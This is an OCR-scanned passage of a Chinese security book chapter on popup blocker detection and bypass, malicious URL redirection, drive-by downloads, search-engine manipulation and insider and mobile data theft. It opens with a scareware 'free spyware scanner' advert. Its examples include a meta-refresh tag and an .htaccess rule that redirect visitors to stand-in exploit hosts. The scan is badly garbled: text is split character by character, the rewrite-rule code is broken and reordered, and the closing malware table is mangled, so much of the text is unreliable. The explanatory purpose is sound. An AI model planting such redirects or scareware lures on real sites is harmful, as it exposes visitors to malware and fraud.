To scan your PC for Spyware - Download a FREE Scanner - Click Here! 





警告 : 我 们 已 经 发 现 你 的 PC 被 间谍 软件 感染 ! 间谍 软件 一 般 会 记录 你 的 互联 网 活动 ， 如 电子 邮件 密码 、 即 时 消息 


、 网 上 银 


AS 一 


行业 务 、 聊 天 室 、 约 会 网 站 /成 人 网 站 和 其 他 你 访问 的 网 站 。 一 旦 安装 到 你 的 PC 上 ， 间 谍 软 件 将 你 的 个 人 信息 传 到 第 三 方 一 一 未 


经 你 的 允许 。 为 了 扫描 PC 上 的 间谍 软件 ， 下 载 一 个 免费 的 扫描 程序 





单 击 这 里 | 


识别 弹出 窗口 拦截 程序 


下 面 是 一 个 简单 的 函数 ， 你 可 以 运行 它 来 验证 主机 上 弹出 窗口 拦截 程序 的 存在 ， 或 者 测试 你 自己 的 弹出 窗口 拦截 程序 的 能 
Jj: 


function DetectBlocker() { 


var oWin = window.open ("","detectblocker","width=100,height=100, 
top=5000, left=5000"); 

if (oWin==null || typeof (oWin)=="undefined") { 

return true; 

} else { 


oWin.close(); 
return false; 


} 
} 


绕 过 弹出 式 .窗口 拦 截 程序 


不 法 的 广告 商 不 断 地 寻找 避 开 弹出 窗口 限制 的 方法 。 一 些 弹出 式 广 告 使 用 Adobe Flash 来 生成 ， 利 用 这 种 方法 ， 弹 出 式 窗 口 
会 被 发 现 ， 因 为 没有 新 的 弹出 窗口 生成 ， 广 告 将 在 当前 窗口 中 运行 。2.1.1 节 中 的 代码 是 可 以 用 于 避 开 弹出 窗口 拦截 程序 的 许 
多 方法 之 一 。 拦 截 程序 的 版 本 很 多 ， 本 书 无 法 一 一 提 及 ， 为 了 举例 ， 我 们 将 关注 于 用 来 避 开 你 的 弹出 窗口 拦截 程序 的 方法 。 


使 用 HTML 的 弹出 窗口 HTML 弹出 窗口 没有 效果 ， 因 为 弹出 窗口 拦截 程序 能 够 轻易 地 识别 网 页 中 嵌入 的 HTML 语 句 ， 如 : 


< a href="htmlpage.htm" target="_blank" >a link to your pop-up< /a > 


正如 你 所 看 到 的 ， 任 何 安全 程序 都 将 很 快 地 识别 这 段 代 码 ， 并 且 不 允许 这 个 链接 打开 ， 除 非 你 按 下 ctrl-c 和 /或 在 你 的 安全 设 
置 允 许 弹出 窗口 的 网 站 上 。 


注意 : 更 新 系统 上 使 用 的 所 有 浏览 器 是 一 个 好 习惯 ， 不 仅 可 以 确保 拥有 所 有 新 功能 ， 还 可 以 得 到 浏览 器 制造 商 为 其 浏览 器 
发 的 所 有 安全 解决 方案 。 


使 用 Javascript 的 弹出 窗口 ”使 用 JavaScript， 你 可 以 在 动画 中 徐 入 弹出 窗口 ， 这 在 以 前 比 HTML 更 难以 发 现 ， 但 是 现在 已 
经 不 难 发 现 了 。 如 果 你 仔细 察看 下 面 的 代码 片断 ， 就 会 看 到 有 不 同 的 生成 弹出 窗口 的 方法 ， 但 是 同样 ， 如 果 存 在 一 个 弹出 窗口 拦 
截 程序 ， 你 就 达 不 到 目的 。 


实例 A 


function launch () { 
target="/xyz/xyz" 


y=window.open (target, "newwin", "scrollbars=yes, 
status=yes,menubar=no, resizable=yes") ; 
y.focus; 


} 


实例 B 


Function openPop(u) { 
newWindow=window.open(u, 'popup', 'height=540,width=790,toolbar=no, 
scrollbars=no') ; 


使 用 Flash 的 弹出 窗口 ” Javascript 可 以 通过 Flash 动 画 传递 ， 但 是 使 用 Flash， 你 还 可 以 使 用 Actionscript 来 创建 一 个 弹出 窗 
O: 

Import flash.external.ExternalInterface; 

Function myFunc() :Void 

var url:String = "http://www.popup.net"; 

var windowName:String = "mywindow"; 

var windowOptions:String = "width:800,height:800"; 

ExternalInterface.call ( "window.open", url, windowName, windowOptions ) ; 
@ sanws 


大 部 分 现代 的 浏览 器 带 有 弹出 窗口 拦截 工具 ， 第 三 方 的 工具 则 包含 了 其 他 功能 ， 例 如 广告 过 滤 。 


弹出 窗口 拦截 ”许多 网 站 在 不 扰乱 当前 窗口 的 情况 下 使 用 弹出 窗口 显示 信息 。 例 如 ， 如 果 你 打算 在 网 页 上 填写 一 个 表单 上 且 需 
要 额外 的 指导 ， 弹 出 窗口 可 以 为 你 提供 指南 ， 这 样 你 就 不 会 丢失 已 经 输入 到 表单 的 信息 。 


一 些 基 于 Web 的 应 用 程序 安装 程序 使 用 弹出 式 窗口 来 安装 软件 ， 例 如 Adobe Flash Player 的 安装 程序 。 一 定 要 了 解 要 求 你 
安装 的 是 什么 ， 黑 客 可 能 包含 一 个 基于 Web 的 软件 安装 ， 看 上 去 似乎 是 合法 的 ， 但 是 实际 上 却 是 一 个 恶意 软件 ， 这 个 软件 合法 
地 安装 在 你 的 计算 机 上 后 ， 会 将 你 的 计算 机 开放 给 其 他 的 下 载 程序 和 弹出 窗口 。 


许多 互联 网 浏览 器 中 ， 在 单 击 链接 的 同时 按 下 Ctrl 键 能 使 你 绕 过 弹出 窗口 拦截 程序 。 昌 然 实际 上 现在 的 浏览 器 都 有 弹出 窗口 
拦截 程序 ， 但 是 它们 的 功能 各 有 不 同 。 由 于 大 的 浏览 器 厂商 有 更 多 的 研究 和 开发 预算 ， 它 们 的 产品 更 能 够 跟 上 攻击 者 的 注入 方 
法 。 你 还 可 以 自 定义 每 种 弹出 窗口 拦截 程序 来 满足 你 的 需求 。 


2.1.2 ”搜索 引擎 重 定向 


网 站 管理 员 或 者 开发 人 员 在 网 站 中 使 用 重 定 向 有 多 种 原因 。 让 我 们 从 管理 和 恶意 软件 的 角度 来 快速 地 看 看 这 些 原因 ， 以 便 更 
好 地 理解 让 管理 员 更 轻松 的 简单 功能 是 如 何 同时 被 进一步 的 犯罪 活动 利用 的 。 


类 似 的 域名 


网 站 访问 者 经 常 错 误 地 输入 URL， 例 如 ，gooogle.com 或 者 googel.com。 有 网 站 的 组 织 常常 会 列 出 这 些 错误 拼写 的 域名 并 
且 将 访问 者 重 定向 到 正确 的 位 置 ， 比 如 上 例 中 的 google.com。 还 有 ，Web 地 址 example.com 和 example.net 也 可 以 被 重 定向 到 
一 个 域 或 者 网 页 (如 example.org) 。 这 种 方法 常常 被 用 于 “保留 ”相同 名 称 的 顶级 域名 (TLD) ， 或 者 使 一 个 真实 的 .edu 或 
者 .net 更 容易 重 定向 到 容易 识别 的 .com 域 名 。 


将 一 个 网 站 移动 到 新 的 域 


为 什么 要 重 定向 一 个 网 页 ? 

. 网 站 可 能 需要 修改 域名 。 

.网 站 创作 者 可 能 将 网 页 转移 到 一 个 新 域 。 
. 两 个 网 站 可 能 合并 。 


使 用 URL 重 定向 ， 指 向 上 昌 URL 的 输入 链接 将 被 发 送 到 正确 的 位 置 ， 例 如 ， 如 果 你 转移 到 一 个 新 的 域名 提供 商 ， 并 且 需 要 将 访 
间 者 从 你 的 旧 服 务 器 转 到 新 的 服务 器 。 有 很 多 合法 的 URL 重 定向 ,但 是 根据 本 书 的 宗旨 ， 我 们 会 介绍 攻击 者 可 能 使 用 URL 重 定向 
来 感染 你 的 系统 的 恶毒 方法 。 


恶意 的 重 定 向 可 能 来 自 于 尚未 了 解 到 变化 的 网 站 ， 或 者 来 自 于 已 经 允许 域名 注册 过 期 ， 而 犯罪 组 织 购买 了 该 域名 的 旧 网 站 ; 
没有 产生 怀疑 的 用 户 单 击 浏览 器 收藏 夹 中 的 书签 到 达 这 些 网 站 。 对 于 搜索 引擎 也 一 样 ， 搜 索引 警 常常 在 数据 库 中 保留 旧 的 域名 和 
链接 并 且 将 搜索 用 户 送 到 这 些 旧 的 URL。 当 网 站 使 用 一 个 指向 新 的 URL 的 永久 转移 重 定向 ， 访 问 者 几乎 总 能 到 达 正 确 的 页 面 。 而 
且 ,， 在 下 一 次 搜索 时 ， 搜 索引 擎 可 能 会 发 现 并 且 使 用 更 新 的 URL。 但 是 ， 攻 击 者 利用 了 这 些 旧 的 信息 。 现 在 由 于 搜索 引擎 的 网 站 
索引 更 加 可 靠 ， 这 种 利用 也 变 得 更 难 了 。 


重 定向 的 主要 问题 是 ， 攻 击 者 可 以 诱惑 访问 者 到 一 个 已 知 网 站 副本 ， 而 这 个 副本 装 入 时 具有 多 个 注入 点 ， 访 问 者 一 旦 单 击 就 
会 被 恶意 软件 所 感染 。 现 在 恶意 软件 使 用 的 URL 重 定向 范围 很 广 且 数量 很 多 ， 主 要 用 于 人 牟取 金钱 利益 。 如 果 你 在 互联 网 上 搜索 ， 
将 会 发 现在 数 干 个 论坛 中 ， 用 户 抱怨 恶意 软件 将 不 明 真 相 的 受害 者 重 定向 到 按 点 击 付费 的 网 站 ， 如 色情 网 站 和 /或 其 他 黑客 按照 
单 击 得 到 网 站 所 有 者 付费 的 共享 软件 网 站 。 恶 意 软件 一 旦 安装 到 受害 主机 上 ， 一 般 会 生成 多 个 弹出 窗口 并 且 将 受害 者 当前 打开 的 
浏览 器 重 定向 到 受害 者 访问 时 会 付费 给 黑客 的 网 站 ， 以 及 /或 者 提供 散布 更 多 的 恶意 软件 的 手段 一 一 这 与 所 谓 的 drive-by 
download 相 似 。 下 图 是 drive-by download 的 一 个 例子 ，drive-by download 发 生 在 受害 者 访问 一 个 网 站 并 且 被 要 求 安装 新 软 
件 时 ， 这 个 软件 可 能 来 自 于 一 个 集团 公司 ， 但 是 它 引 入 了 额外 的 后 台 下 载 或 者 恶意 软件 ， 从 而 安装 或 者 执行 任何 被 事先 授意 (或 
者 预先 安排 ) 的 应 用 程序 。 





Security Warning | x| 





Do you want to install and run "'[after accepting our 
agreements] PrecisionT ime/D ateM anager, free 10 second 
GAIN ad-supported downloads that display [i] exact 
time/date, and [ii] GAIN-branded ads selected based on 
websites you view? Click here to read our agreements. 
Click Yes to accept" signed on 10/20/2003 12:18 PM 
and distributed by: 
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Signing 2001-4 CA 
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safe. You should only install/view this content if you trust 
The Gator Corporation to make that assertion. 
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记录 出 站 链接 


几乎 所 有 Web 服 务 器 的 访问 日 志 都 保留 一 定 水 平 的 访问 者 信息 一 一 他 们 来 自 哪里 以 及 如 何 访问 该 网 站 。 这 些 服务 器 一 般 不 
记录 关于 访问 者 如 何 离开 网 站 的 信息 。 这 是 因为 访问 者 的 浏览 器 在 单 击 出 站 URL 链 接 的 时 候 不 需要 与 原来 的 服务 器 通信 但 是 这 
种 信息 可 以 以 多 种 方式 捕捉 到 。 


第 一 种 捕捉 的 方式 涉及 URL 重 定向 。 除 了 将 客户 直接 发 送 到 第 二 个 网 站 之 外 ， 链 接 还 可 以 指向 第 一 个 网 站 域 上 的 一 个 自动 重 
定向 到 原始 目标 的 URL。 这 种 请 求 在 服务 器 日 志 中 留 下 了 跟踪 信息 ， 指 明了 下 一 个 链接 。 这 种 方法 可 以 用 来 发 现下 一 个 被 访问 的 
网 站 ， 以 便 计 划 对 这 些 网 站 的 攻击 。 如 果 你 的 目标 是 收集 个 人 或 者 集团 的 信息 ， 就 可 以 使 用 这 种 方法 来 指导 他 们 访问 的 是 你 的 站 
点 还 是 你 所 控制 的 站 点 。 这 种 方法 的 缺点 是 给 每 个 指向 原始 网 站 服务 器 的 请 求 增加 了 一 些 延 迟 。 


从 攻击 者 的 角度 看 ， 配 置 你 的 网 络 来 监视 或 者 记录 所 有 出 站 的 HTTP 和 HTTPS 网 站 活动 是 很 聪明 的 。 从 安全 分 析 的 角度 看 ， 
这 种 配置 在 调查 恶意 软件 爆发 时 特别 有 帮助 ; 你 必须 在 被 感染 的 机 器 试图 更 新 代码 库 或 者 升级 到 另 一 个 级 别 的 特洛伊 木马 之 前 尽 
快 地 识别 出 来 。 由 于 黑客 攻击 网 络 具有 比 过 去 更 高 的 精确 度 和 技能 水 平 ， 系 统 上 的 恶意 软件 的 更 新 也 就 变 得 越 来 越 快 了 。 


对 付 搜索 引擎 


攻击 者 也 可 能 修改 搜索 引擎 所 用 的 元 数据 ， 以 便 捕 捉 更 多 搜索 具体 的 词语 而 不 知道 如 何 正确 地 搜索 互联 网 和 /或 识别 有 效 网 


站 的 受害 者 。 重 定向 技术 已 被 用 于 诱骗 网 站 访问 者 多 年 了 ， 例 如 在 网 站 的 index meta name content 或 者 Keywords 段 的 误导 信 
息 可 以 非法 用 于 诱骗 受害 者 或 者 对 其 进行 社会 工程 ， 使 其 访问 该 网 站 以 便 进 行 在 客户 浏览 器 上 的 攻击 、 启 动 一 次 drive-by 
download， 或 者 试图 仿冒 受害 者 的 信息 。 这 种 方法 可 以 改变 搜索 引擎 查 询 的 结果 ， 从 而 将 受害 者 诱骗 到 这 个 网 站 上 来 。 


重 定向 还 被 用 于 “窃取 ”流行 网 页 的 排名 ， 并 且 将 其 用 于 不 同 的 用 途 ， 一 般 包 括 状 态 代码 302HTTP 或 者 Moved 
Temporarily (临时 移 除 ) 。 


搜索 引擎 提供 商 发 现 这 个 问题 并 且 已 经 在 采取 合适 的 措施 来 保护 用 户 。 一 般 来 说 采用 这 种 技术 来 控制 搜索 引擎 的 网 站 在 搜索 
引擎 公司 发 现 这 种 欺诈 行为 之 后 会 得 到 惩罚 ， 它 们 的 排名 会 被 降低 或 者 被 排除 在 搜索 引 警 索引 之 外 。 但 是 ， 发 现 这 种 欺诈 可 能 需 
要 几 周 ， 甚 至 几 个 月 的 时 间 。 


操纵 访问 者 


URL 重 定向 有 时 候 用 于 仿冒 攻击 ， 使 用 户 混淆 他 们 正在 访问 的 网 站 。 这 种 类 型 的 威胁 也 能 很 快 地 把 访问 者 带 到 存储 恶意 代码 
的 网 站 ， 而 不 是 一 开始 受害 者 所 看 到 的 良性 网 站 。 


o 重 定向 技术 和 攻击 


流行 性 





攻击 者 可 以 使 用 多 种 技术 将 访问 者 重 定向 到 他 们 的 网 站 。 首 先 我 们 介绍 可 用 的 管理 功能 ， 然 后 将 讨论 这 些 功能 如 何 用 于 蛋 恶 
的 目的 。 


刷新 元 标记 


在 许多 情况 下 ， 使 用 刷新 元 标记 (refresh meta tag) 是 重 定向 访问 者 的 最 简单 方法 。 下 面 是 一 个 简单 的 标记 ， 说 明了 管理 
员 为 了 刷新 网 站 上 的 信息 所 做 的 典型 工作 。 大 部 分 新 闻 机 构 使 用 这 种 方法 确保 在 网 站 上 停留 较 长 时 间 的 访问 者 能 看 到 及 时 更 新 的 
内 容 。 在 定义 好 的 一 段 时 间 之 后 ， 浏 览 器 刷新 并 且 显 示 新 添加 的 内 容 。 看 看 这 些 基 本 的 HTML 标 记 ， 你 可 以 看 到 浏览 器 在 600 秒 
之 后 被 刷新 。 


<meta http-equiv="refresh" content="600"> 


现在 如 果 你 使 用 相同 的 HTML 代 码 行 ， 加 上 一 个 额外 的 推送 地 址 ， 就 能 在 不 生成 弹出 窗口 的 情况 下 将 用 户 重 定向 到 另 一 个 网 
站 。 在 不 引起 怀疑 的 情况 下 ， 攻 击 者 能 在 访问 者 查看 完 计 划 中 的 网 站 之 后 简单 地 转发 到 一 个 收 恶 的 网 站 ， 只 要 像 下 面 这 样 重 写 
refresh 标 记 就 可 以 了 : 


<meta http-equiv="refresh" content="120;url=http://pwpwpw123123.net/expl0l1t"> 


refresh 标 记 中 的 唯一 不 同 是 几 个 额外 的 HTML 标 记 。 现 在 每 当 访问 者 浏览 这 个 网 站 ， 过 一 会 儿 ， 他 就 会 被 重 定向 到 一 个 装 
入 客户 端 基于 浏览 器 的 攻击 和 /或 按 单 击 收费 的 网 站 。 如 果 快 速 地 使 用 这 个 功能 ， 使 得 用 户 来 不 及 按 下 浏览 器 的 后 退 按钮 ， 就 会 
使 用 户 很 快 地 认为 ， 这 个 网 站 是 合法 的 ， 而 不 是 一 个 在 后 台 运 行 恶意 软件 的 收 恶 网 站 。 


手工 重 定向 
最 简单 的 技术 是 要 求 访问 者 单 击 一 个 指向 新 网 页 的 链接 ， 通 常 使 用 如 下 的 HTML 链 接 锚 : 


Click here to new page <a href="http://hackedlink.net/">link</a> 


多 半 ， 有 恶意 网 站 都 链接 在 一 起 。 例 如 ， 专 业 的 电影 盗版 网 站 和 /或 非法 的 破解 软件 网 站 一 般 会 链接 到 色情 网 站 ， 反 之 亦 然 ， 
它们 互相 支持 ， 如 同 相互 依赖 的 共生 体 。 一 般 来 说 ， 大 部 分 健壮 的 防 病毒 引擎 或 者 防 间谍 软件 网 站 将 会 在 访问 者 单 击 时 发 现 恶意 
网 站 ， 然 后 阻塞 该 网 站 和 /或 向 访问 者 提出 警告。 但 是 ， 多 数 时 候 是 访问 者 没有 得 到 通知 、 恶 意 软件 没有 被 发 现 ， 访 问 者 的 计算 
机 系统 却 不 知 不 党 地 受到 了 感染 。 


HTTP3xx 状 态 代 码 
因为 万 维 网 使 用 HTTP 协 议 ， 来 自 Web 服 务 器 的 带 有 3xx 状 态 代码 的 响应 也 可 以 作为 引导 访问 者 到 其 他 位 置 的 重 定向 。 
HTTP 标 准 为 URL 重 定向 定义 了 多 种 状态 代码 : 
300 多 重 选择 (例如 ， 提 供 不 同 的 语言 
301K ABE 
- 302 找 到 (例如 ， 临 时 重 定向 ) 
303 发 现 其 他 (例如 ，CGI 脚 本 结果 ) 
. 307 临 时 重 定向 


注意 : 这 些 状态 代码 以 HTTP 响 应 的 Location: headet 中 给 出 的 URL 作 为 重 定向 的 目标 。300 多 重 选择 代码 通常 在 消息 体 中 显示 
所 有 选择 并 且 在 Location: headet 中 说 明 默认 的 选择 。 


在 3xx 的 范围 中 ， 也 有 和 以 上 代码 有 显著 不 同 的 状态 代码 (这 里 不 作 讨论 ) : 


:304 未 修改 
- 305 使 用 代理 
下 面 是 一 个 使 用 301 永 久 移 除 重 定向 的 标准 HTTP 响 应 的 例子 : 


HTTP/1.1 301 Moved Permanently 
Location: http://www. example.org/ 
Content-Type: text/html 
Content-Length: 174 


<html> 


<head> 
<title>Moved</title> 
</head> 

<body> 
<hl>Moved</h1> 


<p>This page has moved to <a href="http://www.example.org/">http: //www 
.example.org/</a>.</p> 

</body> 

</html> 


使 用 服务 器 端 脚本 进行 重 定 向 


Web 创 作者 常常 没有 生成 这 些 状 态 代码 的 权限 : HTTP 报头 由 Web 服 务 器 应 用 程序 (server applet) 生成 ， 不 是 从 用 于 该 
URL 的 文件 中 翻译 而 来 。 即 使 对 于 CGI 脚本 ，Web 服 务 器 通常 也 会 自动 创建 状态 代码 并 且 人 允许 脚本 添加 自 定义 的 报头 到 页 面 上 。 
要 用 CGI 脚本 创建 状态 代码 ， 必 须 启 用 未 解析 报头 (nonpased header) 。 


有 时 候 ， 由 一 个 标准 的 CGI 脚本 打印 “Location : URL” 报 头 行 就 足够 了 。 许 多 Web 服 务 器 为 这 样 的 应 答 选择 一 个 3xx 状 态 
代码 。HTTP 协 议 要 求 这 种 转发 完全 自行 发 送 ， 没 有 任何 网 页 信息 。 结 果 ， 使 用 脚本 语言 将 用 户 浏览 器 重 定向 到 其 他 页 面 的 Web 
开发 人 员 必 须 确 保 这 个 重 定向 是 响应 的 第 一 个 或 者 唯一 部 分 。 在 ASP 脚 本 语言 中 ， 这 也 可 以 使 用 方法 response.buffer=true 和 
response.redirect “http://www.example.com” 来 完成 。 使 用 PHP 时 ， 你 可 以 使 用 


header ("Location: http://www.example.com") 。 


按照 HTTP 标 准 ，Location 报 头 必须 有 一 个 绝对 URL。 当 从 一 个 页 面 重 定向 到 同一 个 网 站 的 男 一 个 页 面 时 ， 使 用 相对 URL 是 
一 个 常见 的 错误 。 结 果 是 ， 大 部 分 浏览 器 允许 Location 报 头 中 的 相对 URL， 但 是 一 些 浏 览 器 生成 一 个 显示 给 最 终 用 户 的 警告 。 


使 用 .htaccess 进 行 重 定向 


使 用 Apache Web 服 务 器 时 ， 可 以 使 用 针对 目录 的 .htaccess 文 件 (还 有 Apache 的 主 配置 文件 ) 。 例 如 ， 为 了 重 定向 到 一 个 
页 面 ， 使 用 下 列 代码 : 


Redirect 301 /old.html http://www.malicious2u.net/new.html 


为 了 改变 域名 ， 使 用 下 列 代码 : 


RewriteEngine On 
RewriteCond %{HTTP HOST} *.*oldwebsite\.coms [NC] 


“(.*)S http://www.preferredwebsite.net/$1 [R=301,L] 


RewriteRule 
当 把 .htaccess 用 于 这 种 目的 时 ， 通 常 不 要 求 具 备 管理 员 权 限 ; 而 如 果 需 要 这 种 权限 ， 这 些 设置 可 能 被 禁用 。 当 你 有 权 访 问 
Apache 主 配置 文件 (http.conf) 时 ， 最 好 避免 使 用 .htaccess 文 件 。 


刷新 元 标记 和 HTTP 刷 新 报头 


Netscape 引 入 了 一 种 通常 被 称 为 元 刷新 (meta-refresh) 的 功能 ， 在 定义 的 一 段 时 间 之 后 刷新 显示 页 面 。 使 用 这 种 功能 ， 
可 以 指向 新 页 面 的 URL， 从 而 切换 到 另 一 个 页 面 或 者 刷新 在 该 页 面 上 找到 的 某 些 形式 的 内 容 。 下 面 是 可 用 的 元 刷新 选项 类 型 : 


- HITML<meta> 标 记 
专 有 扩展 (proprietary extensions) 
超时 值 为 0 秒表 示 立 即 重 定向 。 


下 面 是 一 个 使 用 这 种 技术 的 简单 HTML 文 档 实例 : 


<html><head> 

<meta http-equiv="Refresh" content="0; url=http://www.example.com/"> 
</head><body> 

<p>Please follow <a href="http://www.example.com/">link</a>!</p> 
</body></html> 


这 种 技术 对 所 有 Web 创 作者 都 起 作用 ， 因 为 meta 标 记 包含 在 文档 本 身 之 中 。 这 种 技术 需要 记 住 的 要 点 如 下 : 


.meta 标记 必须 放 在 HTML 文件 的 head 段 。 
: 这 个 实例 使 用 的 变量 0 可 以 替换 为 另 一 个 变量 以 得 到 一 个 延迟 (以 秒 计算 ) 。 许 多 用 户 党 得 这 种 延迟 令 人 烦恼 ， 除 非 有 充 
足 的 理由 。 


- 这 是 Netscape 添 加 的 非 标准 功能 ， 大 部 分 Web 浏 览 器 都 支持 。 
下 面 是 通过 发 出 HTTP 刷 新 报头 达到 相同 效果 的 一 个 实例 : 


HTTP/1.1 200 ok 
Refresh: 0; url=http://www.example.com/ 


Content-type: text/html 
Content-length: 78 


Please follow <a href="http://www.example.com/">link</a>! 


这 个 响应 对 于 CGI 程序 来 说 更 容易 生成 ， 因 为 不 需要 修改 默认 的 状态 代码 。 下 面 是 模拟 这 种 重 定向 的 一 个 简单 CGI 程序 : 


#!/usr/bin/perl 

print "Refresh: 0; url=http://www.example.com/\r\n"; 

print "Content-type: text/html\r\n"; 

print "\r\n"; 

print "Please follow <a href=\"http://www.example.com/\">link</a>!" 


Javascript 重 定向 


Javascript 提 供 多 种 方法 来 在 当前 浏览 器 窗口 中 显示 不 同 的 页 面 ， 这 些 方法 相当 多 地 用 在 重 定 向 上 。 但 是 ， 用 HTTP 报 头 或 
者 刷新 原 标记 ( 尽 可 能 地 ) 替换 JavaScript 有 很 多 理由 : 


+ 有 些 浏览 器 不 支持 JavaScript。 
` 许多 网 络 爬 下 〈 例 如 来 自 搜索 引擎 的 ) 不 执行 JavaScript。 


注意 : 搜索 “你 将 被 重 定 向 ”将 会 发 现 几 乎 每 个 JavaSctipt 重 定向 采用 的 都 是 不 同 的 方法 。 这 使 得 Web 客 户 端 开发 人 员 在 没有 
实现 JavaScript 中 的 所 有 模块 的 情况 下 难以 对 你 的 重 定向 请 求 表 示 尊 敦 。 


创建 一 个 包含 目标 页 面 的 HTML 框 架 (frame) 能 够 取得 稍微 不 同 的 效果 : 


<frameset rows="100%"> 
<frame src="http://www.example.com/"> 
</frameset> 
<noframes> 
<body>Please follow <a href="http://www.example.com/">link</a>!</body> 
</noframes> 


这 种 重 定向 方法 的 一 个 主要 不 同 是 对 于 框架 重 定向 ,浏览 器 在 URL 栏 中 显示 框架 文档 的 URL， 而 不 是 目标 网 页 的 URL。 这 种 
技术 通常 被 称 为 伪装 (cloaking) ， 可 以 用 于 使 读者 看 到 更 可 信 的 URL， 或 者 出 于 欺骗 的 目的 ， 作 为 网 站 欺诈 的 一 部 分 来 隐藏 仿 
冒 的 网 站 。 


重 定向 循环 


一 个 重 定向 很 可 能 引起 另 一 个 重 定向 。 例 如 ，URL http://www.example.com/URL redirection (注意 域名 中 的 不 同 ) 首 
先 被 重 定向 到 http://ww1.example.com/URL redirection， 然 后 再 被 重 定向 到 正确 的 
URL: http://test.example.com/URL redirection。 这 样 做 是 恰当 的 ， 因 为 第 一 次 重 定向 更 正 了 错误 的 域名 ， 下 一 个 重 定向 选 
择 了 正确 的 语言 部 分 。 最 后 ， 浏 览 器 显示 源 网 页 。 但 是 有 了 时候，Web 服 务 器 的 一 个 错误 可 能 导致 重 定向 回 到 第 一 个 页 面 ， 引 起 
永 不 结束 的 重 定向 循环 。 浏 览 器 一 般 在 几 次 之 后 停止 这 一 循环 并 且 显 示 一 个 错误 信息 。 


= 重 定向 对 策 


重 定向 相当 令 人 烦恼 ， 在 删除 引起 重 定向 的 恶意 软件 之 后 ， 你 必须 检查 浏览 器 。 清 除 浏览 器 缓存 并 删除 所 有 附加 程序 和 扩展 
一 一 有 些 恶 意 软 件 安装 引发 重 定向 的 附加 程序 或 者 扩展 。 


2.1.3 ”数据 盗窃 


数据 盗窃 是 处 于 上 升 趋势 的 一 个 问题 ， 主 要 是 具有 网 络 资源 (例如 ， 台 式 计算 机 ， 平 板 电 脑 和 智能 手机 等 移动 设备 ， 闪 存 
盘 、 多 媒体 设备 存储 设备 ， 甚 至 能 够 存储 数码 信息 的 数码 相机 ) 访问 权 的 办 公 室 工作 人 员 所 为 。 所 有 这 些 设备 一 般 都 保存 着 大 量 
公司 专 有 信息 ， 这 些 信息 通常 由 网 络 和 安全 管理 员 管理 。 因 为 员工 常常 花费 大 量 的 时 间 来 开发 公司 的 联 络 人 、 机 密 以 及 受到 版 
权 保 护 的 信息 ， 他 们 往往 会 觉得 自己 对 这 些 信息 有 某 种 权力 。 他 们 普遍 也 有 可 能 在 离开 公司 时 复制 或 者 删除 部 分 信息 ， 或 者 在 仍 
被 雇用 的 时 候 将 这 些 信息 用 在 不 正当 的 方面 。 


有 些 员工 将 会 带 走 像 客户 和 业务 联络 人 这 样 的 信息 ， 并 且 利 用 它们 为 自己 牟利 或 者 用 于 私下 交易 。 我 们 在 私下 曾经 多 次 看 到 
销售 人 员 用 这 种 方法 来 得 到 额外 的 收入 。 销 售 人 员 复 制 一 份 联络 人 信息 数据 库 ， 将 它 用 于 下 一 份 工作 是 常常 发 生 的 事情 ， 这 很 明 
显 是 违反 雇佣 条 款 的 行为 。 尽 管 大 部 分 的 组 织 实现 了 防火 墙 以 及 入 侵 检测 系统 ， 但 是 很 少 考虑 来 自 普 通 员工 的 危险 ， 他 们 常常 将 
专 有 数据 复制 到 自己 的 工作 计算 机 、 移 动 设备 ， 某 些 时 候 还 可 能 在 他 们 的 家 庭 计算 机 上 被 用 于 私利 或 者 为 其 他 公司 所 用 。 考 虑 到 
当今 的 技术 和 员工 的 能 力 ， 可 以 在 很 短 的 时 间 里 通过 电子 邮件 、 网 页 、USB 设 备 (如 闪存 盘 、 外 接 硬盘 、 光 盘 ) 和 其 他 手持 设备 
传递 很 大 的 文件 ， 数 据 盗窃 造成 的 损失 可 能 无 法 估量 。 


在 对 付 恶 意 软件 的 时 候 ， 也 可 能 发 生 同 样 的 事情 ， 而 且 甚 至 与 你 的 组 织 中 的 员工 没有 联系 。 很 多 时 候 ， 员 工 甚 至 可 能 有 意 在 
组 织 中 启动 恶意 软件 ， 作 为 窃取 数据 的 手段 ， 甚 至 只 是 为 了 泄愤 而 感染 组 织 的 网 络 。 恶 意 软件 感染 可 能 通过 使 用 可 移动 媒体 设备 
或 者 直接 互联 网 传输 发 生 。 随 着 具有 硬盘 般 容量 的 可 移动 设备 越 来 越 小 ， 快 速 的 盗窃 行为 (如 窃取 保存 在 目标 系统 上 的 智能 手机 
同步 信息 ) 变 得 越 来 越 常见 。 

现在 存储 1TB 数 据 的 设备 可 以 放 进 一 个 员工 的 口袋 里 ， 这 些 数据 可 能 使 公司 垮台 。 恶 意 软 件 甚 至 被 编写 出 来 感染 公司 或 者 个 
人 的 移动 设备 ， 用 于 窃取 信息 或 者 使 恶意 软件 能 够 感染 用 户 的 个 人 计算 机 ， 以 图 通过 网 络 传播 到 其 他 设备 来 达到 各 种 目的 。 


移动 设备 恶意 软件 


移动 设备 现在 是 企业 界 的 一 部 分 。 大 部 分 移动 设备 (如 iPhone、iPad 和 Android 设 备 ) 都 能 直接 连接 到 企业 网 络 ， 这 些 设 
备 可 能 造成 安全 威胁 ， 因 为 当 它们 没有 采用 企业 设置 时 ， 往 往 连接 到 其 他 不 安全 的 网 络 。 

攻击 者 已 经 发 现 了 这 一 潮流 ， 所 以 他 们 开始 针对 移动 设备 进行 数据 盗窃 。 一 旦 这 些 移动 设备 被 入 侵 且 连接 到 企业 网 络 ， 数 据 
可 能 会 泄露 到 网 络 系统 之 外 一 一 特别 是 在 专门 为 窃取 企业 信息 而 编写 移动 设备 恶意 软件 时 。 

表 2-1 详 细 列 出 了 一 些 在 最 近 几 年 中 出 现 的 编写 设备 恶意 软件 的 例子 。 其 中 一 些 恶 意 软 件 除 了 破坏 设备 之 外 没有 别 的 害处 ， 
而 其 他 恶意 软件 会 从 你 的 移动 设备 窃取 数据 ， 并 且 将 其 发 送 给 黑客 ， 或 者 在 移动 设备 被 插入 到 连接 装置 时 通过 网 络 系统 传播 。 


表 2-1 移动 设备 恶意 软件 


恶意 软件 年 份 注入 / 传播 技术 恶意 软件 目标 / 意图 


安装 后 ，Konvo 将 试图 从 你 的 Symbian OS 设备 发 送 
消息 给 付费 的 特别 号 码 


ee 这 个 恶意 软件 感染 你 的 Symbian OS 和 短 消 息 应 用 程 
SMSCurse 2008 | 文件 /代码 执行 = a snl ess 4 ae ais i ie: i 
序 ， 并 且 使 短 消 息 功 能 永久 性 失效 ， 直 到 你 重建 设备 
, Z 这 个 恶意 软件 阻止 你 的 Symbian OS 设备 启动 ， 直 到 
Yakkis.A 2009 | 文件 /代码 执行 oe i 7 
